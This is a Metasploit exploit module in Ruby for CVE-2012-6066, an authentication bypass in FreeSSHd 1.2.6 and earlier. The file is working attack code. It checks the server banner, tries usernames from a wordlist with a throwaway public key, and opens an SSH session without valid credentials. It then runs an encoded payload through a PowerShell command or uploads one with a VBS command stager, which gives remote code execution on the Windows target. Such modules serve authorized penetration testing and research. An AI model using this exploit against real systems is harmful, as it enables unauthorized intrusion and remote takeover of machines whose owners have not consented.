metasploit-framework/modules/exploits/windows/ssh/freesshd_authbypass.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "Freesshd Authentication Bypass",
        'Description'    => %q{
          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
          authentication. You just need the username (which defaults to root). The exploit
          has been tested with both password and public key authentication.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Aris', # Vulnerability discovery and Exploit
            'kcope', # 2012 Exploit
            'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module
            'Imran E. Dawoodjee <imrandawoodjee[at]infosec@gmail.com> (minor improvements)' # minor improvements
          ],
        'References'     =>
          [
            ['CVE', '2012-6066'],
            ['OSVDB', '88006'],
            ['BID', '56785'],
            ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
            ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
          ],
        'Platform'       => 'win',
        'Privileged'     => true,
        'Targets'        =>
          [
            ['PowerShell', {}],
            ['CmdStager upload', {}]
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => '2010-08-11'
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [false, 'A specific username to try']),
        OptPath.new(
          'USER_FILE',
          [
            true,
            "File containing usernames, one per line",
            # Defaults to unix_users.txt, because this is the closest one we can try
            File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
          ]
        )
      ]
    )
  end

  def check
    connect
    banner = sock.recv(30)
    disconnect
    if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
      version = banner.split(" ")[1]
      return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)

      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    @connection.exec!("cmd.exe /c " + cmd)
  end

  def setup_ssh_options
    {
      password:        rand_text_alpha(8),
      port:            datastore['RPORT'],
      timeout:         1,
      proxies:         datastore['Proxies'],
      key_data:        OpenSSL::PKey::RSA.new(2048).to_pem,
      auth_methods:    ['publickey'],
      verify_host_key: :never
    }
  end

  def do_login(username, options)
    print_status("Trying username '#{username}'")
    options[:username] = username

    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
    auth = Net::SSH::Authentication::Session.new(transport, options)
    auth.authenticate("ssh-connection", username, options[:password])
    connection = Net::SSH::Connection::Session.new(transport, options)
    begin
      Timeout.timeout(10) do
        connection.exec!('cmd.exe /c echo')
      end
    rescue Timeout::Error
      print_status("Timeout")
      return nil
    rescue RuntimeError
      return nil
    end
    connection
  end

  #
  # Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
  # So we have to write our own each_user here.
  #
  def each_user
    user_list = []
    if datastore['USERNAME'] && !datastore['USERNAME'].empty?
      user_list << datastore['USERNAME']
    else
      f = File.open(datastore['USER_FILE'], 'rb')
      buf = f.read
      f.close

      user_list = (user_list | buf.split).uniq
    end

    user_list.each do |user|
      yield user
    end
  end

  def exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
    end

    options = setup_ssh_options

    @connection = nil

    each_user do |username|
      next if username.empty?

      @connection = do_login(username, options)
      break if @connection
    end

    if @connection
      case target.name
      when 'PowerShell'
        print_status('Executing payload via Powershell...')
        psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
        @connection.exec!("cmd.exe /c " + psh_command)
      when 'CmdStager upload'
        print_status("Uploading payload, this may take several minutes...")
        execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
      end
    end
  end
end